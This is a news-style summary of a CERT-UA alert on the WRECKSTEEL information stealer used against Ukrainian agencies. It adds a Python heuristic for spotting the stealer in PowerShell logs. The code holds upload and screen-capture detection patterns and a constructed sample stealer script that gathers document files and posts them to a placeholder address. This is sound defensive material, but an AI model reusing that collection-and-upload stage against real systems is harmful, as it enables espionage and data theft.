The Ukrainian Government's Computer Emergency Response Team (CERT-UA) has issued an alert regarding a series of cyberattacks targeting critical government agencies and infrastructure, aimed at stealing sensitive information from compromised systems using an information stealer called "WRECKSTEEL". The malware, written in VBScript and PowerShell, is designed specifically for file exfiltration and espionage.
CERT-UA has reported at least three distinct cyber incidents during the month, where attackers leveraged compromised user accounts to distribute malicious emails. These emails contained links to public file-sharing services such as DropMeFiles and Google Drive, sometimes embedded in PDF attachments. Clicking on these links triggered the download and execution of a VBScript loader, which in turn executed a PowerShell script.
The PowerShell script searches the infected system for specific file types and exfiltrates them. The targeted files include documents (.doc, .txt, .docx, .xls, .xlsx, .pdf, .rtf, .odt, .csv, .ods), presentations (.ppt, .pptx), and images (.png, .jpg, .jpeg). In addition, the malware captures screenshots of the infected system.
Further investigation revealed that this activity has been ongoing since at least the fall of 2024. In the 2024 attacks, the attackers used EXE files built with the NSIS installer. These files bundled decoy documents (PDF, JPG) together with a VBScript stealer, and relied on the "IrfanView" image viewer to capture screenshots.
Starting in 2025, screenshot capture has been built directly into the PowerShell script, removing the dependency on a third-party tool.
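As an added illustration from the defender's side (this is example code, not code from the CERT-UA alert or from the malware), the following heuristic scores PowerShell script-block log text (such as the ScriptBlockText field of Windows PowerShell event 4104) against the traits described above: enumeration of many of the listed file extensions combined with a screen-capture or HTTP-upload stage. The screen-capture and upload patterns are assumed indicators chosen for the example, not details given in the alert, and the sample log text is constructed.

```python
import re

# Extensions the PowerShell stealer hunts for, as listed in the CERT-UA alert.
TARGET_EXTENSIONS = {
    "doc", "txt", "docx", "xls", "xlsx", "pdf", "rtf", "odt", "csv", "ods",
    "ppt", "pptx", "png", "jpg", "jpeg",
}

# Assumed indicators (not from the alert): common .NET screen-capture and
# PowerShell HTTP upload idioms used to spot the screenshot and exfiltration stages.
SCREENSHOT_RE = re.compile(r"CopyFromScreen|System\.Drawing\.Bitmap", re.I)
UPLOAD_RE = re.compile(r"Invoke-(?:WebRequest|RestMethod)[^\n]*-Method\s+Post|\.UploadFile\(", re.I)
# Wildcard extension filters such as "*.docx" as they appear in -Include / -Filter arguments.
EXT_RE = re.compile(r"\*\.([a-z0-9]{2,5})\b", re.I)

def score_script_block(script: str) -> dict:
    """Return which WRECKSTEEL-like traits a script block shows."""
    exts = {m.lower() for m in EXT_RE.findall(script)} & TARGET_EXTENSIONS
    return {
        "target_ext_hits": len(exts),
        "screenshot": bool(SCREENSHOT_RE.search(script)),
        "upload": bool(UPLOAD_RE.search(script)),
    }

def is_suspicious(script: str, min_ext_hits: int = 5) -> bool:
    """Flag when a script enumerates many of the targeted extensions AND either
    captures the screen or posts data out; a plain document search alone is benign."""
    s = score_script_block(script)
    return s["target_ext_hits"] >= min_ext_hits and (s["screenshot"] or s["upload"])

# Constructed sample script-block text (stand-in for event 4104 ScriptBlockText), not real malware.
SAMPLE_STEALER = r"""
Get-ChildItem $env:USERPROFILE -Recurse -Include *.doc,*.docx,*.xls,*.xlsx,*.pdf,*.rtf,*.odt,*.csv,*.ods,*.ppt,*.pptx,*.png,*.jpg,*.jpeg
$g.CopyFromScreen(...)
Invoke-WebRequest -Uri <placeholder> -Method Post -InFile <archive>
"""
# Constructed benign admin script: touches two of the extensions, no capture, no upload.
SAMPLE_BENIGN = r"""
Get-ChildItem C:\Reports -Include *.xlsx,*.csv | Export-Csv inventory.csv
"""
```

Thresholds like `min_ext_hits` should be tuned against the environment's own script-block logs, since legitimate backup or inventory scripts may also enumerate several of these extensions.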
CERT-UA tracks this activity as UAC-0219.